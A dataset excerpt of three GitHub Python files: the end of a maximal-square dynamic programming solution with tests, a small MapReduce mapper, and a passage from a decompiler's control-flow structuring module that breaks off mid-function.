complexity: O(mn)\n    # Space complexity: O(mn)\n\n    rows, cols = len(matrix), len(matrix[0])\n\n    dp = [[0] * (cols + 1) for _ in range(rows + 1)]\n    max_side = 0\n    for r in range(1, rows + 1):\n        for c in range(1, cols + 1):\n            if matrix[r - 1][c - 1]:\n                min_neighbor = min(dp[r - 1][c], dp[r - 1][c - 1], dp[r][c - 1])\n                dp[r][c] = 1 + min_neighbor\n\n                if dp[r][c] > max_side:\n                    max_side = dp[r][c]\n\n    # print_matrix(dp)\n    return max_side * max_side\n\n\ndef dp_tabulation_opt(matrix: List[List[int]]) -> int:\n    # Dynamic programming - Tabulation (space-optimized)\n    # Time complexity: O(mn)\n    # Space complexity: O(1)\n    # Modify the input list `matrix` to store partial results\n\n    rows, cols = len(matrix), len(matrix[0])\n\n    # Special cases\n    if rows == 1:\n        return max(matrix[0])\n    if cols == 1:\n        return max(row[0] for row in matrix)\n\n    max_side = 0\n    # Check for ones in the first row and columns, and initialize\n    # `max_side` to 1 if so\n    if any(v for v in matrix[0]) or any(row[0] for row in matrix):\n        max_side = 1\n\n    # Loop over the elements of the `matrix`, skipping the first\n    # row and column (already handled)\n    for r in range(1, rows):\n        for c in range(1, cols):\n            if matrix[r][c]:\n                matrix[r][c] = 1 + min(\n                    matrix[r][c - 1], matrix[r - 1][c - 1], matrix[r - 1][c]\n                )\n                if matrix[r][c] > max_side:\n                    max_side = matrix[r][c]\n    # print_matrix(matrix)\n    return max_side * max_side\n\n\nif __name__ == \"__main__\":\n    print(\"-\" * 60)\n    print(\"Maximal square\")\n    print(\"-\" * 60)\n\n    test_cases = [\n        ([[0]], 0),\n        ([[1]], 1),\n        ([[0, 1, 1]], 1),\n        ([[0, 1], [1, 1]], 1),\n        ([[0, 1], [1, 0]], 1),\n        ([[1, 1], [1, 1]], 4),\n        ([[1, 1, 1], [1, 0, 0], [1, 0, 0]], 1),\n        ([[0, 1, 1], [1, 0, 0], [1, 0, 0]], 1),\n        ([[1, 1, 0], [1, 1, 1], [1, 1, 1]], 4),\n        ([[1, 1, 1], [1, 1, 1], [1, 1, 1]], 9),\n        ([[1, 1, 1], [1, 1, 1], [1, 1, 0]], 4),\n        ([[1, 1, 0, 1], [1, 1, 1, 1], [1, 1, 1, 1]], 4),\n        ([[1, 1, 0, 1], [0, 1, 0, 1], [1, 0, 1, 0]], 1),\n        ([[1, 0, 1, 0, 0], [1, 0, 1, 1, 1], [1, 1, 1, 1, 1], [1, 0, 0, 1, 0]], 4),\n    ]\n\n    for matrix, solution in test_cases:\n\n        print(\"Matrix:\")\n        print_matrix(matrix)\n\n        result = dp_memoization(deepcopy(matrix))\n        output = f\"\\t dp_memoization = \"\n        output += \" \" * (10 - len(output))\n        test_ok = solution == result\n        output += str(result)\n        output += \" \" * (55 - len(output))\n        output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n        print(output)\n\n        result = dp_tabulation(deepcopy(matrix))\n        output = f\"\\t dp_tabulation = \"\n        output += \" \" * (10 - len(output))\n        test_ok = solution == result\n        output += str(result)\n        output += \" \" * (55 - len(output))\n        output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n        print(output)\n\n        result = dp_tabulation_opt(deepcopy(matrix))\n        output = f\"\\t dp_tabulation_opt = \"\n        output += \" \" * (10 - len(output))\n        test_ok = solution == result\n        output += str(result)\n        output += \" \" * (55 - len(output))\n        output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n        print(output)\n\n        print()\n","repo_name":"daalgi/algorithms","sub_path":"dynamic_programming/minmax/max_square.py","file_name":"max_square.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29156075455","text":"#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\n\ndef clr_spaces(x):\n    x = x.replace(\"\\n\", \"\")\n    x = x.replace(\"\\r\", \"\")\n    return x\n\ndef amount(x):\n    return clr_spaces(x[1]) + \"*\" + clr_spaces(x[0])\n\nfor line 
in sys.stdin:\n result = line.split(',')\n print(amount(result))\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-jdbuilesm","sub_path":"pregunta_03/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73043825533","text":"from collections import defaultdict\nfrom dataclasses import dataclass, field, replace\nfrom typing import DefaultDict, Dict, List, Optional, Set, Tuple, Union\n\nfrom .flow_graph import (\n BasicNode,\n ConditionalNode,\n FlowGraph,\n Node,\n ReturnNode,\n SwitchNode,\n TerminalNode,\n)\nfrom .options import Options, Target\nfrom .translate import (\n BinaryOp,\n BlockInfo,\n CommaConditionExpr,\n Condition,\n Expression,\n Formatter,\n FunctionInfo,\n Literal,\n Statement as TrStatement,\n SwitchControl,\n early_unwrap_ints,\n format_expr,\n get_block_info,\n simplify_condition,\n)\nfrom .types import Type\n\n\n@dataclass\nclass Context:\n flow_graph: FlowGraph\n fmt: Formatter\n options: Options\n is_void: bool = True\n switch_nodes: Dict[Node, int] = field(default_factory=dict)\n case_nodes: DefaultDict[Node, List[Tuple[int, str]]] = field(\n default_factory=lambda: defaultdict(list)\n )\n goto_nodes: Set[Node] = field(default_factory=set)\n emitted_nodes: Set[Node] = field(default_factory=set)\n has_warned: bool = False\n\n\n@dataclass\nclass IfElseStatement:\n condition: Condition\n if_body: \"Body\"\n else_body: Optional[\"Body\"] = None\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n space = fmt.indent(\"\")\n condition = simplify_condition(self.condition)\n cond_str = format_expr(condition, fmt)\n after_ifelse = f\"\\n{space}\" if fmt.coding_style.newline_after_if else \" \"\n before_else = f\"\\n{space}\" if fmt.coding_style.newline_before_else else \" \"\n with fmt.indented():\n if_str = \"\\n\".join(\n [\n f\"{space}if ({cond_str}){after_ifelse}{{\",\n self.if_body.format(fmt), # has its own indentation\n f\"{space}}}\",\n ]\n )\n if self.else_body is not None and not self.else_body.is_empty():\n sub_if = self.else_body.get_lone_if_statement()\n if sub_if:\n sub_if_str = sub_if.format(fmt).lstrip()\n else_str = f\"{before_else}else {sub_if_str}\"\n else:\n with fmt.indented():\n else_str = \"\\n\".join(\n [\n f\"{before_else}else{after_ifelse}{{\",\n self.else_body.format(fmt),\n f\"{space}}}\",\n ]\n )\n if_str = if_str + else_str\n return if_str\n\n\ndef comments_for_switch(index: int) -> List[str]:\n if index == 0:\n return []\n return [f\"switch {index}\"]\n\n\n@dataclass\nclass SwitchStatement:\n jump: SwitchControl\n body: \"Body\"\n # If there are multiple switch statements in a single function, each is given a\n # unique index starting at 1. 
This is used in comments to make control flow clear.\n index: int\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n lines = []\n comments = []\n body_is_empty = self.body.is_empty()\n comments.extend(comments_for_switch(self.index))\n if self.jump.is_irregular:\n comments.append(\"irregular\")\n elif not self.jump.jump_table:\n comments.append(\"unable to parse jump table\")\n elif body_is_empty:\n comments.append(f\"jump table: {self.jump.jump_table.symbol_name}\")\n head = f\"switch ({format_expr(self.jump.control_expr, fmt)})\"\n if body_is_empty:\n lines.append(fmt.with_comments(f\"{head};\", comments))\n else:\n if fmt.coding_style.newline_after_if:\n lines.append(fmt.with_comments(f\"{head}\", comments))\n lines.append(fmt.indent(\"{\"))\n else:\n lines.append(fmt.with_comments(f\"{head} {{\", comments))\n with fmt.indented(fmt.coding_style.switch_indent_level):\n lines.append(self.body.format(fmt))\n lines.append(fmt.indent(\"}\"))\n return \"\\n\".join(lines)\n\n\n@dataclass\nclass SimpleStatement:\n contents: Optional[Union[str, TrStatement]]\n comments: List[str] = field(default_factory=list)\n is_jump: bool = False\n indent: int = 0\n\n def should_write(self) -> bool:\n return self.contents is not None or bool(self.comments)\n\n def format(self, fmt: Formatter) -> str:\n if self.contents is None:\n content = \"\"\n elif isinstance(self.contents, str):\n content = self.contents\n else:\n content = self.contents.format(fmt)\n\n return fmt.with_comments(content, self.comments, indent=self.indent)\n\n def clear(self) -> None:\n self.contents = None\n self.comments = []\n\n\n@dataclass\nclass LabelStatement:\n context: Context\n node: Node\n\n def should_write(self) -> bool:\n return self.node in self.context.goto_nodes or bool(\n self.context.case_nodes.get(self.node)\n )\n\n def format(self, fmt: Formatter) -> str:\n lines = []\n if self.node in self.context.case_nodes:\n for (switch, case_label) in self.context.case_nodes[self.node]:\n comments = comments_for_switch(switch)\n lines.append(fmt.with_comments(f\"{case_label}:\", comments, indent=-1))\n if self.node in self.context.goto_nodes:\n lines.append(f\"{label_for_node(self.context, self.node)}:\")\n return \"\\n\".join(lines)\n\n\n@dataclass\nclass DoWhileLoop:\n body: \"Body\"\n condition: Condition\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n space = fmt.indent(\"\")\n after_do = f\"\\n{space}\" if fmt.coding_style.newline_after_if else \" \"\n cond = format_expr(simplify_condition(self.condition), fmt)\n with fmt.indented():\n return \"\\n\".join(\n [\n f\"{space}do{after_do}{{\",\n self.body.format(fmt),\n f\"{space}}} while ({cond});\",\n ]\n )\n\n\nStatement = Union[\n SimpleStatement,\n IfElseStatement,\n LabelStatement,\n SwitchStatement,\n DoWhileLoop,\n]\n\n\n@dataclass\nclass Body:\n print_node_comment: bool\n statements: List[Statement] = field(default_factory=list)\n\n def extend(self, other: \"Body\") -> None:\n \"\"\"Add the contents of `other` into ourselves\"\"\"\n self.print_node_comment |= other.print_node_comment\n self.statements.extend(other.statements)\n\n def add_node(self, node: Node, comment_empty: bool) -> None:\n block_info = get_block_info(node)\n statements = block_info.statements_to_write()\n\n # Add node header comment\n if self.print_node_comment and (statements or comment_empty):\n self.add_comment(f\"Node {node.name()}\")\n # Add node contents\n for item in statements:\n 
self.statements.append(SimpleStatement(item))\n\n    def add_statement(self, statement: Statement) -> None:\n        self.statements.append(statement)\n\n    def add_comment(self, contents: str) -> None:\n        self.add_statement(SimpleStatement(None, comments=[contents]))\n\n    def add_if_else(self, if_else: IfElseStatement) -> None:\n        if if_else.else_body is None or if_else.if_body.ends_in_jump():\n            # We now know that we have an IfElseStatement like `if (A) { B; goto C; } else { D; }`\n            # where `D` may be empty. We can rewrite this into `if (A) { B; goto C; } D;`\n            # which reduces indentation to make the output more readable.\n\n            # Append the final outermost `if_else`, without an `else_body` and rewritten to try\n            # to avoid CommaConditionExprs.\n            self.statements.append(rewrite_if_ands(if_else.condition, if_else.if_body))\n\n            # Move the original `else_body` out of the block (if set)\n            if if_else.else_body is not None:\n                self.extend(if_else.else_body)\n        else:\n            # Simple case; perform no further rewrites\n            self.statements.append(if_else)\n\n    def add_do_while_loop(self, do_while_loop: DoWhileLoop) -> None:\n        self.statements.append(do_while_loop)\n\n    def add_switch(self, switch: SwitchStatement) -> None:\n        self.add_statement(switch)\n\n    def is_empty(self) -> bool:\n        return not any(statement.should_write() for statement in self.statements)\n\n    def ends_in_jump(self) -> bool:\n        \"\"\"\n        Returns True if the body ends in an unconditional jump (`goto` or `return`),\n        which may allow for some syntax transformations.\n        For example, this is True for bodies ending in a ReturnNode, because\n        `return ...;` statements are marked with is_jump.\n        This function is conservative: it only returns True if we're\n        *sure* that the control flow won't continue past the Body boundary.\n        \"\"\"\n        for statement in self.statements[::-1]:\n            if not statement.should_write():\n                continue\n            return isinstance(statement, SimpleStatement) and statement.is_jump\n        return False\n\n    def get_lone_if_statement(self) -> Optional[IfElseStatement]:\n        \"\"\"If the body consists solely of one IfElseStatement, return it, else None.\"\"\"\n        ret: Optional[IfElseStatement] = None\n        for statement in self.statements:\n            if statement.should_write():\n                if not isinstance(statement, IfElseStatement) or ret:\n                    return None\n                ret = statement\n        return ret\n\n    def elide_empty_returns(self) -> None:\n        \"\"\"Remove `return;` statements from the end of the body.\n        If the final statement is an if-else block, recurse into it.\"\"\"\n        for statement in self.statements[::-1]:\n            if (\n                isinstance(statement, SimpleStatement)\n                and statement.contents == \"return;\"\n            ):\n                statement.clear()\n            if not statement.should_write():\n                continue\n            if isinstance(statement, IfElseStatement):\n                statement.if_body.elide_empty_returns()\n                if statement.else_body is not None:\n                    statement.else_body.elide_empty_returns()\n            # We could also do this to SwitchStatements, but the generally\n            # preferred style is to keep the final return/break\n            break\n\n    def format(self, fmt: Formatter) -> str:\n        return \"\\n\".join(\n            statement.format(fmt)\n            for statement in self.statements\n            if statement.should_write()\n        )\n\n\ndef rewrite_if_ands(condition: Condition, if_body: \"Body\") -> IfElseStatement:\n    \"\"\"\n    Iterate through the left-heavy `&&`-joined subconditions in `condition`, checking\n    for CommaConditionExprs. 
When encountered, convert the original if statement into\n a series of nested if's.\n\n This can transform input like: if (cond1 && cond2 && cond3) { if_body }\n into nested ifs like: if (cond1) { if (cond2) { if (cond3) { if_body } } }\n ...when `cond2` and `cond3` are CommaConditionExprs, which avoids the need for the comma operator.\n\n Warning: This rewrite is only valid if there is no else block in the original if\n statement, or if `if_body` ends in a jump.\n \"\"\"\n outer_cond: Condition = condition\n inner_conds: List[Condition] = []\n while (\n isinstance(outer_cond, BinaryOp)\n and isinstance(outer_cond.left, Condition)\n and outer_cond.op == \"&&\"\n and isinstance(outer_cond.right, Condition)\n ):\n # Move the iterator forward\n cond = outer_cond.right\n outer_cond = outer_cond.left\n\n if not isinstance(cond, CommaConditionExpr):\n inner_conds.append(cond)\n else:\n # Rewrite the CommaConditionExpr into a nested IfElseStatement.\n # Start by joining all of the iterated `inner_conds` together, following\n # the same left-heavy pattern used in try_make_if_condition.\n inner_cond = cond.condition\n while inner_conds:\n inner_cond = join_conditions(inner_cond, \"&&\", inner_conds.pop())\n\n # Split the `if` into two nested `if`s, to move the CommaConditionExpr and\n # all of the `inner_conds` into an inner if statement. After moving them,\n # we can drop them from the outer if statement (`condition`).\n new_body = Body(print_node_comment=if_body.print_node_comment)\n for stmt in cond.statements:\n new_body.add_statement(SimpleStatement(stmt))\n new_body.add_if_else(\n IfElseStatement(\n condition=inner_cond,\n if_body=if_body,\n else_body=None,\n )\n )\n if_body = new_body\n condition = outer_cond\n\n return IfElseStatement(condition=condition, if_body=if_body, else_body=None)\n\n\ndef label_for_node(context: Context, node: Node) -> str:\n if node.loop:\n return f\"loop_{node.block.index}\"\n else:\n return f\"block_{node.block.index}\"\n\n\ndef emit_node(context: Context, node: Node, body: Body) -> bool:\n \"\"\"\n Try to emit a node for the first time, together with a label for it.\n The label is only printed if something jumps to it, e.g. a loop.\n\n For return nodes, it's preferred to emit multiple copies, rather than\n goto'ing a single return statement.\n\n For other nodes that were already emitted, instead emit a goto.\n Since nodes represent positions in assembly, and we use phi's for preserved\n variable contents, this will end up semantically equivalent. This can happen\n sometimes when early returns/continues/|| are not detected correctly, and\n this hints at that situation better than if we just blindly duplicate the block\n \"\"\"\n if node in context.emitted_nodes:\n # TODO: Treating ReturnNode as a special case and emitting it repeatedly\n # hides the fact that we failed to fold the control flow. Maybe remove?\n if not isinstance(node, ReturnNode):\n emit_goto(context, node, body)\n return False\n else:\n body.add_comment(\n f\"Duplicate return node #{node.name()}. 
Try simplifying control flow for better match\"\n            )\n    else:\n        body.add_statement(LabelStatement(context, node))\n        context.emitted_nodes.add(node)\n\n    body.add_node(node, comment_empty=True)\n    if isinstance(node, ReturnNode):\n        emit_return(context, node, body)\n    return True\n\n\ndef emit_goto(context: Context, target: Node, body: Body) -> None:\n    assert not isinstance(target, TerminalNode), \"cannot goto a TerminalNode\"\n    label = label_for_node(context, target)\n    context.goto_nodes.add(target)\n    body.add_statement(SimpleStatement(f\"goto {label};\", is_jump=True))\n\n\ndef add_labels_for_switch(\n    context: Context,\n    node: Node,\n    case_type: Type,\n    cases: List[Tuple[int, Node]],\n    default_node: Optional[Node],\n) -> int:\n    assert cases, \"jtbl list must not be empty\"\n    switch_index = context.switch_nodes[node]\n\n    # Force hex for case labels if the highest label is above 50, and there are no negative labels\n    indexes = sorted([i for i, _ in cases])\n    use_hex = context.fmt.coding_style.hex_case or (\n        min(indexes) >= 0 and max(indexes) > 50\n    )\n\n    # Keep track of which labels we skipped because they weren't required\n    skipped_labels: List[Tuple[Node, Tuple[int, str]]] = []\n    emitted_label_count = 0\n\n    # Mark which labels we need to emit\n    for index, target in cases:\n        enum_name = case_type.get_enum_name(index)\n        if enum_name:\n            case_label = f\"case {enum_name}\"\n        elif use_hex:\n            if index < 0:\n                case_label = f\"case -0x{-index:X}\"\n            else:\n                case_label = f\"case 0x{index:X}\"\n        else:\n            case_label = f\"case {index}\"\n\n        # Do not emit extra `case N:` labels for targets that are the `default:` block,\n        # that skip the switch block entirely, or that are just jumps to these kinds of nodes.\n        if is_empty_goto(target, default_node) or is_empty_goto(\n            target, node.immediate_postdominator\n        ):\n            skipped_labels.append((target, (switch_index, case_label)))\n        else:\n            context.case_nodes[target].append((switch_index, case_label))\n            emitted_label_count += 1\n\n    if default_node is not None:\n        # \"default\" (with no case number) is used to mark the `default:` block\n        context.case_nodes[default_node].append((switch_index, \"default\"))\n        emitted_label_count += 1\n\n    # If a switch statement only has a few labels, the compiler will prefer to emit\n    # a series of branches instead of using a jump table. It's sometimes possible to\n    # force a jump table by including extra labels, even if they're redundant.\n    # The exact threshold depends on the compiler & exact structure.\n    # These labels may look redundant or be outside of the `switch (...) { ... }` block.\n    if emitted_label_count < 5:\n        for target, label in skipped_labels:\n            context.case_nodes[target].append(label)\n\n    return switch_index\n\n\ndef switch_guard_expr(node: Node) -> Optional[Expression]:\n    \"\"\"\n    Check if `node` is a ConditionalNode for checking the bounds of a SwitchNode's\n    control expression. 
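(A typical guard looks like `if (x >= NUM_CASES) goto default;` emitted just before the jump table; `NUM_CASES` is an illustrative name, not one from this codebase.) 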
If it is, return the control expression, otherwise return None.\n    ConditionalNodes matching this pattern can usually be combined with the successor\n    SwitchNode in the output.\n    \"\"\"\n    if not isinstance(node, ConditionalNode):\n        return None\n    cond = get_block_info(node).branch_condition\n    assert cond is not None\n\n    switch_node = node.fallthrough_edge\n    if not isinstance(switch_node, SwitchNode):\n        return None\n    switch_block_info = get_block_info(switch_node)\n    assert switch_block_info.switch_control is not None\n\n    # The SwitchNode must have no statements, and the conditional\n    # from the ConditionalNode must properly check the jump table bounds.\n    if (\n        switch_node.parents == [node]\n        and not switch_block_info.statements_to_write()\n        and switch_block_info.switch_control.matches_guard_condition(cond)\n    ):\n        return switch_block_info.switch_control.control_expr\n    return None\n\n\ndef is_empty_goto(node: Node, end: Optional[Node]) -> bool:\n    \"\"\"Return True if `node` represents a jump to `end` without any other statements\"\"\"\n    if end is None:\n        return False\n    seen_nodes = {node}\n    while True:\n        if node == end:\n            return True\n        block_info = get_block_info(node)\n        if block_info.statements_to_write():\n            return False\n        if (\n            isinstance(node, ReturnNode)\n            and isinstance(end, TerminalNode)\n            and block_info.return_value is None\n        ):\n            # An empty return counts as a jump to the TerminalNode\n            return True\n        elif isinstance(node, BasicNode):\n            node = node.successor\n            if node in seen_nodes:\n                return False\n            seen_nodes.add(node)\n        else:\n            return False\n    return False\n\n\ndef gather_any_comma_conditions(block_info: BlockInfo) -> Condition:\n    branch_condition = block_info.branch_condition\n    assert branch_condition is not None\n    comma_statements = block_info.statements_to_write()\n    if comma_statements:\n        assert not isinstance(branch_condition, CommaConditionExpr)\n        return CommaConditionExpr(comma_statements, branch_condition)\n    else:\n        return branch_condition\n\n\n@dataclass(frozen=True)\nclass Bounds:\n    \"\"\"\n    Utility class for tracking possible switch control values across multiple\n    conditional branches.\n    \"\"\"\n\n    lower: int = -(2**31)  # `INT32_MIN`\n    upper: int = (2**32) - 1  # `UINT32_MAX`\n    holes: Set[int] = field(default_factory=set)\n\n    def __post_init__(self) -> None:\n        assert self.lower <= self.upper\n\n    def without(self, hole: int) -> \"Bounds\":\n        return replace(self, holes=self.holes | {hole})\n\n    def at_most(self, val: int) -> \"Bounds\":\n        if self.lower <= val <= self.upper:\n            return replace(self, upper=val)\n        elif val > self.upper:\n            return self\n        else:\n            return Bounds.empty()\n\n    def at_least(self, val: int) -> \"Bounds\":\n        if self.lower <= val <= self.upper:\n            return replace(self, lower=val)\n        elif val < self.lower:\n            return self\n        else:\n            return Bounds.empty()\n\n    def values(self, *, max_count: int) -> Optional[List[int]]:\n        values: List[int] = []\n        for i in range(self.lower, self.upper + 1):\n            if i not in self.holes:\n                values.append(i)\n            if len(values) > max_count:\n                return None\n        return values\n\n    @staticmethod\n    def empty() -> \"Bounds\":\n        return Bounds(lower=0, upper=0, holes={0})\n\n\ndef try_make_if_condition(\n    chained_cond_nodes: List[ConditionalNode], end: Node\n) -> Optional[Tuple[Condition, Node, Optional[Node]]]:\n    \"\"\"\n    Try to express the nodes in `chained_cond_nodes` as a single `Condition` `cond`\n    to make an if-else statement. 
`end` is the immediate postdominator of the first\n node in `chained_cond_nodes`, and is the node following the if-else statement.\n\n Returns a tuple of `(cond, if_node, else_node)` representing:\n ```\n if (cond) {\n goto if_node;\n } else {\n goto else_node;\n }\n ```\n If `else_node` is `None`, then the else block is empty and can be omitted.\n\n This function returns `None` if the topology of `chained_cond_nodes` cannot\n be represented by a single `Condition`.\n \"\"\"\n start_node = chained_cond_nodes[0]\n if_node = chained_cond_nodes[-1].fallthrough_edge\n else_node: Optional[Node] = chained_cond_nodes[-1].conditional_edge\n assert else_node is not None\n\n # Check that all edges point \"forward\" to other nodes in the if statement\n # and translate this DAG of nodes into a dict we can easily modify\n allowed_nodes = set(chained_cond_nodes) | {if_node, else_node}\n node_cond_edges: Dict[ConditionalNode, Tuple[Condition, Node, Node]] = {}\n for node in chained_cond_nodes:\n if (\n node.conditional_edge not in allowed_nodes\n or node.fallthrough_edge not in allowed_nodes\n ):\n # Not a valid set of chained_cond_nodes\n return None\n allowed_nodes.remove(node)\n\n block_info = get_block_info(node)\n if node is start_node:\n # The first condition in an if-statement will have unrelated\n # statements in its to_write list, which our caller will already\n # have emitted. Avoid emitting them twice.\n cond = block_info.branch_condition\n assert isinstance(cond, Condition)\n else:\n # Otherwise, these statements will be added to the condition\n cond = gather_any_comma_conditions(block_info)\n\n node_cond_edges[node] = (cond, node.conditional_edge, node.fallthrough_edge)\n\n # Iteratively (try to) reduce the nodes into a single condition\n #\n # This is done through a process similar to \"Rule T2\" used in interval analysis\n # of control flow graphs, see ref. slides 17-21 of:\n # http://misailo.web.engr.illinois.edu/courses/526-sp17/lec1.pdf\n #\n # We have already ensured that all edges point forward (no loops), and there\n # are no incoming edges to internal nodes from outside the chain.\n #\n # Pick the first pair of nodes which form one of the 4 possible reducible\n # subgraphs, and then \"collapse\" them together by combining their conditions\n # and adjusting their edges. This process is repeated until no more changes\n # are possible, and is a success if there is exactly 1 condition left.\n while True:\n # Calculate the parents for each node in our subgraph\n node_parents: Dict[ConditionalNode, List[ConditionalNode]] = {\n node: [] for node in node_cond_edges\n }\n for node in node_cond_edges:\n for child in node_cond_edges[node][1:]:\n if child not in (if_node, else_node):\n assert isinstance(child, ConditionalNode)\n node_parents[child].append(node)\n\n # Find the first pair of nodes which form a reducible pair: one will always\n # be the *only* parent of the other.\n # Note: we do not include `if_node` or `else_node` in this search\n for child, parents in node_parents.items():\n if len(parents) != 1:\n continue\n parent = parents[0]\n child_cond, child_if, child_else = node_cond_edges[child]\n parent_cond, parent_if, parent_else = node_cond_edges[parent]\n\n # The 4 reducible subgraphs, see ref. 
slides 21-22 of:\n # https://www2.cs.arizona.edu/~collberg/Teaching/553/2011/Resources/ximing-slides.pdf\n # In summary:\n # - The child must have exactly one incoming edge, from the parent\n # - The parent's other edge must be in common with one of the child's edges\n # - Replace the condition with a combined condition from the two nodes\n # - Replace the parent's edges with the child's edges\n if parent_if is child_if and parent_else is child:\n parent_else = child_else\n cond = join_conditions(parent_cond, \"||\", child_cond)\n elif parent_if is child_else and parent_else is child:\n parent_else = child_if\n cond = join_conditions(parent_cond, \"||\", child_cond.negated())\n elif parent_if is child and parent_else is child_if:\n parent_if = child_else\n cond = join_conditions(parent_cond, \"&&\", child_cond.negated())\n elif parent_if is child and parent_else is child_else:\n parent_if = child_if\n cond = join_conditions(parent_cond, \"&&\", child_cond)\n else:\n continue\n\n # Modify the graph by replacing `parent`'s condition/edges, and deleting `child`\n node_cond_edges[parent] = (cond, parent_if, parent_else)\n node_cond_edges.pop(child)\n break\n else:\n # No pair was found, we're done!\n break\n\n # Were we able to collapse all conditions from chained_cond_nodes into one?\n if len(node_cond_edges) != 1 or start_node not in node_cond_edges:\n return None\n cond, left_node, right_node = node_cond_edges[start_node]\n\n # Negate the condition if the if/else nodes are backwards\n if (left_node, right_node) == (else_node, if_node):\n cond = cond.negated()\n else:\n assert (left_node, right_node) == (if_node, else_node)\n\n # Check if the if/else needs an else block\n if else_node is end:\n else_node = None\n elif if_node is end:\n # This is rare, but re-write if/else statements with an empty if body\n # from `if (cond) {} else { else_node; }` into `if (!cond) { else_node; }`\n cond = cond.negated()\n if_node = else_node\n else_node = None\n\n return (cond, if_node, else_node)\n\n\ndef try_build_irregular_switch(\n context: Context, start: Node, end: Node\n) -> Optional[SwitchStatement]:\n \"\"\"\n Look for irregular switch-like structures from nested ConditionalNodes & SwitchNodes.\n If one is found, return the corresponding SwitchStatement; otherwise, return None.\n\n Both IDO & GCC can convert switch statements into a tree of comparisons & jump tables.\n We try to identify the largest contiguous tree of ConditionalNodes & SwitchNodes that\n all compare the same variable (`var_expr`). 
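For example (an illustrative sketch, not taken from real compiler output), a tree like `if (x == 100) goto case_100; else if (x < 50) goto jump_table; else goto default_case;` can fold back into a single `switch (x)`. 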
SwitchNodes and `(x == N)` ConditionalNodes\n    represent jumps to specific case labels, whereas comparisons like `(x < N)` are\n    primarily used to manage the overall tree depth.\n    \"\"\"\n    # The start node must be an `if` (ConditionalNode)\n    if not isinstance(start, ConditionalNode):\n        return None\n\n    assert end in start.postdominators\n    start_block_info = get_block_info(start)\n    control_expr = switch_guard_expr(start)\n    var_expr: Optional[Expression] = None\n\n    # Try to extract the switch's control expression\n    if control_expr is not None:\n        # `if (x >= len(jump_table))`: var_expr is `x`\n        var_expr = control_expr\n    elif start_block_info.branch_condition is not None:\n        start_cond = simplify_condition(start_block_info.branch_condition)\n        if (\n            start_cond is not None\n            and isinstance(start_cond, BinaryOp)\n            and isinstance(start_cond.right, Literal)\n        ):\n            # `if (x == N)`: var_expr is `x`\n            # The `start_cond.op` is checked in the first iter of the while loop below\n            var_expr = start_cond.left\n    if var_expr is None:\n        return None\n\n    # Unwrap EvalOnceExpr's and Cast's; ops like `<=` always include an `(s32)` cast\n    uw_var_expr = early_unwrap_ints(var_expr)\n    # Nodes we need to visit & their bounds, initially just the `start` node over a full int32\n    node_queue: List[Tuple[Node, Bounds]] = [(start, Bounds())]\n    # Nodes we have already visited, to avoid infinite loops\n    visited_nodes: Set[Node] = set()\n    # Nodes that have no statements, and should be marked as emitted if we emit a SwitchStatement.\n    # A ConditionalNode like `if (x == N)` isn't directly emitted; it's replaced by a `case N:` label\n    # This also includes empty BasicNodes & ReturnNodes that jump directly to the end\n    nodes_to_mark_emitted: Set[Node] = set()\n    # Map of label -> node. Similar to SwitchNode.cases, but the labels may not be contiguous\n    cases: Dict[int, Node] = {}\n    # The `default:`-labeled node, if found\n    default_node: Optional[Node] = None\n    # Number of \"irregular\" comparison nodes used (SwitchNodes & ConditionalNodes that aren't guards)\n    irregular_comparison_count = 0\n\n    while node_queue:\n        node, bounds = node_queue.pop()\n        if node in visited_nodes or node == end or node == default_node:\n            continue\n        visited_nodes.add(node)\n        block_info = get_block_info(node)\n\n        if node != start and block_info.statements_to_write():\n            # Unless the node is the start node, it cannot have any statements to write\n            pass\n\n        elif is_empty_goto(node, end):\n            # Empty returns/gotos are special cases: the compiler may have folded\n            # this node together with one outside the original interval. So, this node\n            # may fail the `start not in node.dominators` check below.\n            # Otherwise, treat these like empty BasicNodes.\n            nodes_to_mark_emitted.add(node)\n            if isinstance(node, BasicNode):\n                node_queue.append((node.successor, bounds))\n            continue\n\n        elif start not in node.dominators or end not in node.postdominators:\n            # The node must be within the [start, end] interval\n            pass\n\n        elif isinstance(node, BasicNode):\n            # This node has no statements, so it is just a goto\n            nodes_to_mark_emitted.add(node)\n            node_queue.append((node.successor, bounds))\n            continue\n\n        elif isinstance(node, ConditionalNode):\n            # If this is a \"switch guard\" `if` statement, continue iterating on both branches\n            control_expr = switch_guard_expr(node)\n            if (\n                control_expr is not None\n                and early_unwrap_ints(control_expr) == uw_var_expr\n            ):\n                # We can get away without adjusting the bounds here, even though the switch guard\n                # puts a hole in our bounds. 
If the switch guard covers the range `[n, m]` inclusive,\n # the fallthrough edge is a jump table for these values, and the jump table doesn't\n # need the bounds. On the conditional side, we would only need to accurately track the\n # bounds to find an `n-1` or `m+1` case; however, we can assume these don't exist,\n # because they could have been part of the jump table (instead of a separate conditional).\n node_queue.append((node.fallthrough_edge, bounds))\n node_queue.append((node.conditional_edge, bounds))\n nodes_to_mark_emitted.add(node)\n continue\n\n # Check if the branch_condition is a comparison between var_expr and a Literal\n assert block_info.branch_condition is not None\n cond = simplify_condition(block_info.branch_condition)\n if (\n isinstance(cond, BinaryOp)\n and isinstance(cond.right, Literal)\n and early_unwrap_ints(cond.left) == uw_var_expr\n ):\n # IDO typically uses `x == N` and `x < N` patterns in these if trees, but it\n # will use `x != N` when it needs to jump backwards to an already-emitted block.\n # GCC will more freely use either `x == N` or `x != N`.\n # Examples from PM: func_8026E558, pr_load_npc_extra_anims\n val = cond.right.value\n if cond.op == \"==\":\n if val in cases:\n return None\n cases[val] = node.conditional_edge\n node_queue.append((node.fallthrough_edge, bounds.without(val)))\n elif cond.op == \"!=\" and (\n 